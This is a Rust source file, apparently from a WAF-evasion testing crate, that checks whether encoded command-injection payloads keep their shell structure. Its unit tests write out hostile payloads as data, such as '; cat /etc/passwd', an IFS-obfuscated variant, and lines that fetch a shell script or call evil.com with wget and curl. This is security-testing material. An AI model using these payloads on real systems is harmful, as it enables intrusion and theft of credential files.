wafrift-oracle 0.2.6

Payload validity oracles for SQL, SSRF, path traversal, command injection, and template injection.
Documentation
//! Command injection payload oracle.
//!
//! Command injection payloads are built from up to three structural elements:
//! 1. **A separator** — `;`, `|`, `&&`, `||`, `` ` ``, `$()` that breaks out of the original command
//! 2. **A command** — actual executable to run (`cat`, `whoami`, `id`, `curl`, etc.)
//! 3. **Optional arguments** — file paths, URLs, flags
//!
//! If encoding destroys every separator, or leaves no recognizable command,
//! shell trick, or target path, the payload becomes inert text that the shell
//! will reject or ignore.

use crate::ascii_scan::contains_ascii_insensitive;
use crate::traits::PayloadOracle;
use serde::Deserialize;
use std::sync::OnceLock;

/// Command injection oracle that validates shell command structure preservation.
///
/// This is a stateless unit type; all matching rules come from the embedded TOML
/// rule set, so every value of `CmdiOracle` behaves identically. The common
/// traits are derived so the oracle can be logged, copied, and default-constructed
/// like any other plain value.
#[derive(Debug, Clone, Copy, Default)]
pub struct CmdiOracle;

// ──────────────────────────────────────────────
//  TOML-loaded CMDI oracle rules
// ──────────────────────────────────────────────

/// Compile-time embedded TOML rules for CMDI oracle.
///
/// `include_str!` copies the text of `../rules/cmd/oracle.toml` (resolved relative
/// to this source file) into the binary at build time, so no file is read at runtime.
const CMD_ORACLE_TOML: &str = include_str!("../rules/cmd/oracle.toml");

/// Command separator definition from TOML.
///
/// One element of the `cmd_separator` list in the rules document.
#[derive(Debug, Clone, Deserialize)]
struct CmdSeparator {
    /// Literal text looked for in a payload with a plain substring search.
    pattern: String,
    /// Free-form note accompanying the pattern in the rules document.
    // The field has no serde default, so it must be present for deserialization to
    // succeed, but the code in this file never reads it — hence the lint allowance.
    #[allow(dead_code)]
    description: String,
}

/// Shell command definition from TOML.
///
/// One element of the `shell_command` list in the rules document.
#[derive(Debug, Clone, Deserialize)]
struct ShellCommand {
    /// Command name; payloads are checked for it with the whole-word,
    /// ASCII-case-insensitive `contains_word` test.
    name: String,
    /// Free-form note accompanying the command in the rules document.
    // The field has no serde default, so it must be present for deserialization to
    // succeed, but the code in this file never reads it — hence the lint allowance.
    #[allow(dead_code)]
    description: String,
}

/// Shell trick definition from TOML.
///
/// One element of the `shell_trick` list in the rules document.
#[derive(Debug, Clone, Deserialize)]
struct ShellTrick {
    /// Literal text looked for in a payload with a plain (case-sensitive)
    /// substring search.
    pattern: String,
    /// Free-form note accompanying the pattern in the rules document.
    // The field has no serde default, so it must be present for deserialization to
    // succeed, but the code in this file never reads it — hence the lint allowance.
    #[allow(dead_code)]
    description: String,
}

/// Root structure for oracle.toml.
///
/// Every list is marked `#[serde(default)]`, so a key that is absent from the
/// document deserializes to an empty list instead of causing an error.
#[derive(Debug, Clone, Deserialize)]
struct CmdOracleRules {
    /// Entries under the `cmd_separator` key.
    #[serde(default)]
    cmd_separator: Vec<CmdSeparator>,
    /// Entries under the `shell_command` key.
    #[serde(default)]
    shell_command: Vec<ShellCommand>,
    /// Entries under the `shell_trick` key.
    #[serde(default)]
    shell_trick: Vec<ShellTrick>,
}

/// Returns the shared rule set, deserializing the embedded TOML on first use.
///
/// The result is stored in a `OnceLock`, so parsing happens at most once and
/// later calls hand back the same reference. If the embedded document fails to
/// deserialize, the error is discarded and an all-empty rule set is cached
/// instead.
fn get_rules() -> &'static CmdOracleRules {
    static RULES: OnceLock<CmdOracleRules> = OnceLock::new();
    RULES.get_or_init(|| match toml::from_str::<CmdOracleRules>(CMD_ORACLE_TOML) {
        Ok(parsed) => parsed,
        // Fall back to "no rules" rather than failing.
        Err(_) => CmdOracleRules {
            cmd_separator: Vec::new(),
            shell_command: Vec::new(),
            shell_trick: Vec::new(),
        },
    })
}

/// Returns the separator patterns from the rule set as a flat list of strings.
///
/// The list is built once from `get_rules().cmd_separator` (cloning each
/// `pattern`) and cached for all later calls.
fn cmd_separators() -> &'static [String] {
    static CACHE: OnceLock<Vec<String>> = OnceLock::new();
    let cached = CACHE.get_or_init(|| {
        let mut patterns = Vec::new();
        for separator in &get_rules().cmd_separator {
            patterns.push(separator.pattern.clone());
        }
        patterns
    });
    cached.as_slice()
}

/// Returns the command names from the rule set as a flat list of strings.
///
/// The list is built once from `get_rules().shell_command` (cloning each
/// `name`) and cached for all later calls.
fn shell_commands() -> &'static [String] {
    static CACHE: OnceLock<Vec<String>> = OnceLock::new();
    let cached = CACHE.get_or_init(|| {
        let mut names = Vec::new();
        for command in &get_rules().shell_command {
            names.push(command.name.clone());
        }
        names
    });
    cached.as_slice()
}

/// Returns the shell-trick patterns from the rule set as a flat list of strings.
///
/// The list is built once from `get_rules().shell_trick` (cloning each
/// `pattern`) and cached for all later calls.
fn shell_tricks() -> &'static [String] {
    static CACHE: OnceLock<Vec<String>> = OnceLock::new();
    let cached = CACHE.get_or_init(|| {
        let mut patterns = Vec::new();
        for trick in &get_rules().shell_trick {
            patterns.push(trick.pattern.clone());
        }
        patterns
    });
    cached.as_slice()
}

/// Reports whether `text` contains `word` as a whole word (ASCII case-insensitive).
///
/// `text` is cut into tokens at whitespace, shell metacharacters, quotes, and NUL
/// bytes. Leading `/` characters of each token are dropped, so `/cat` yields the
/// token `cat`. A token matches when it starts with `word` and either ends there
/// or continues with `-` or `/` (e.g. `cat-file`, `cat/etc`).
///
/// An empty `word` never matches. The scan works directly on the bytes of `text`
/// and does not build a lowercased copy of the input.
fn contains_word(text: &str, word: &str) -> bool {
    // Bytes that end a token: whitespace, shell metacharacters, quotes, NUL.
    fn splits_tokens(byte: u8) -> bool {
        matches!(
            byte,
            b' ' | b'\t'
                | b'\n'
                | b'\r'
                | b';'
                | b'|'
                | b'&'
                | b'`'
                | b'$'
                | b'('
                | b')'
                | b'<'
                | b'>'
                | b'\''
                | b'"'
                | 0
        )
    }

    // Bytes allowed to follow the word inside a token without spoiling the match.
    fn ends_word(byte: u8) -> bool {
        splits_tokens(byte) || matches!(byte, b'-' | b'/' | b'(' | b'$')
    }

    let needle = word.as_bytes();
    if needle.is_empty() {
        return false;
    }

    text.as_bytes()
        .split(|&byte| splits_tokens(byte))
        .any(|chunk| {
            // Drop leading slashes so `/cat` is compared as `cat`.
            let leading_slashes = chunk.iter().take_while(|&&byte| byte == b'/').count();
            let token = &chunk[leading_slashes..];
            if token.len() < needle.len() {
                return false;
            }
            let (head, rest) = token.split_at(needle.len());
            head.eq_ignore_ascii_case(needle)
                && rest.first().map_or(true, |&next| ends_word(next))
        })
}

/// Checks whether a payload contains command injection structure.
///
/// Trailing NUL and U+FFFD characters are stripped first. The payload is then
/// considered structural when it contains at least one configured separator
/// AND at least one of:
/// - a configured shell command as a whole word (ASCII case-insensitive),
/// - a configured shell trick (plain substring),
/// - a well-known target marker such as `/etc/passwd`, `/bin/`, or `http://`
///   (ASCII case-insensitive substring).
///
/// The separator test runs first and the remaining tests are chained lazily, so
/// a payload without any separator is rejected without further scans of the
/// payload for every command, trick, and target marker.
fn has_cmdi_structure(payload: &str) -> bool {
    // Target paths / URL schemes that make a separated payload structural on their own.
    const TARGET_MARKERS: [&str; 6] = [
        "/etc/passwd",
        "/etc/shadow",
        "/bin/",
        "/tmp/",
        "http://",
        "https://",
    ];

    let payload = payload.trim_end_matches(['\0', '\u{FFFD}']);

    // A separator is always required; bail out early when there is none.
    let has_separator = cmd_separators()
        .iter()
        .any(|sep| payload.contains(sep.as_str()));
    if !has_separator {
        return false;
    }

    // Any one of these, together with the separator, makes the payload structural.
    // `||` short-circuits, so later checks run only when earlier ones fail.
    shell_commands()
        .iter()
        .any(|cmd| contains_word(payload, cmd))
        || shell_tricks()
            .iter()
            .any(|trick| payload.contains(trick.as_str()))
        || TARGET_MARKERS
            .iter()
            .any(|&marker| contains_ascii_insensitive(payload, marker))
}

impl PayloadOracle for CmdiOracle {
    /// Reports whether `transformed` still has command-injection structure.
    ///
    /// Only `transformed` is inspected (via `has_cmdi_structure`); `_original`
    /// is not consulted.
    fn is_semantically_valid(&self, _original: &str, transformed: &str) -> bool {
        has_cmdi_structure(transformed)
    }

    /// Returns the fixed label `"CMDI"` for this oracle.
    fn name(&self) -> &'static str {
        "CMDI"
    }
}

// Unit tests for `CmdiOracle`. Each test calls `is_semantically_valid` with an
// (original, transformed) pair; only the transformed string influences the verdict.
// The expected outcomes depend on the contents of the embedded rules document.
#[cfg(test)]
mod tests {
    use super::*;

    /// `;` separator followed by a command and a target path is accepted.
    #[test]
    fn semicolon_cat_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("; cat /etc/passwd", "; cat /etc/passwd",));
    }

    /// `|` separator followed by a command is accepted.
    #[test]
    fn pipe_ls_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("| ls -la", "| ls -la"));
    }

    /// `&&` separator with a command and a URL is accepted.
    #[test]
    fn double_ampersand_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid(
            "&& wget http://evil.com/shell.sh",
            "&& wget http://evil.com/shell.sh",
        ));
    }

    /// Backtick command substitution is accepted.
    #[test]
    fn backtick_subshell_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("`id`", "`id`"));
    }

    /// `$( ... )` command substitution is accepted.
    #[test]
    fn dollar_paren_subshell_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("$(whoami)", "$(whoami)"));
    }

    /// `${IFS}` used in place of spaces is still accepted.
    #[test]
    fn ifs_trick_valid() {
        let oracle = CmdiOracle;
        assert!(
            oracle.is_semantically_valid(
                ";${IFS}cat${IFS}/etc/passwd",
                ";${IFS}cat${IFS}/etc/passwd",
            )
        );
    }

    /// A payload whose only separator was URL-encoded is rejected.
    #[test]
    fn encoded_separator_invalid() {
        let oracle = CmdiOracle;
        // URL encoding destroyed the semicolon separator
        assert!(!oracle.is_semantically_valid("; cat /etc/passwd", "%3B cat /etc/passwd",));
    }

    // NOTE(review): the transformed string here is byte-identical to the original,
    // so this test repeats `semicolon_cat_valid` and does not exercise an encoded
    // command despite its name.
    #[test]
    fn encoded_command_still_valid() {
        let oracle = CmdiOracle;
        // Separator preserved, command still readable
        assert!(oracle.is_semantically_valid("; cat /etc/passwd", "; cat /etc/passwd",));
    }

    /// Text with no separator at all is rejected.
    #[test]
    fn plain_text_invalid() {
        let oracle = CmdiOracle;
        assert!(!oracle.is_semantically_valid("; cat /etc/passwd", "hello world"));
    }

    /// The empty string is rejected.
    #[test]
    fn empty_invalid() {
        let oracle = CmdiOracle;
        assert!(!oracle.is_semantically_valid("; cat /etc/passwd", ""));
    }

    /// A newline acting as the separator is accepted.
    #[test]
    fn newline_separator_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("\nid", "\nid",));
    }

    /// `||` separator followed by a command is accepted.
    #[test]
    fn or_pipe_valid() {
        let oracle = CmdiOracle;
        assert!(oracle.is_semantically_valid("|| curl evil.com", "|| curl evil.com"));
    }
}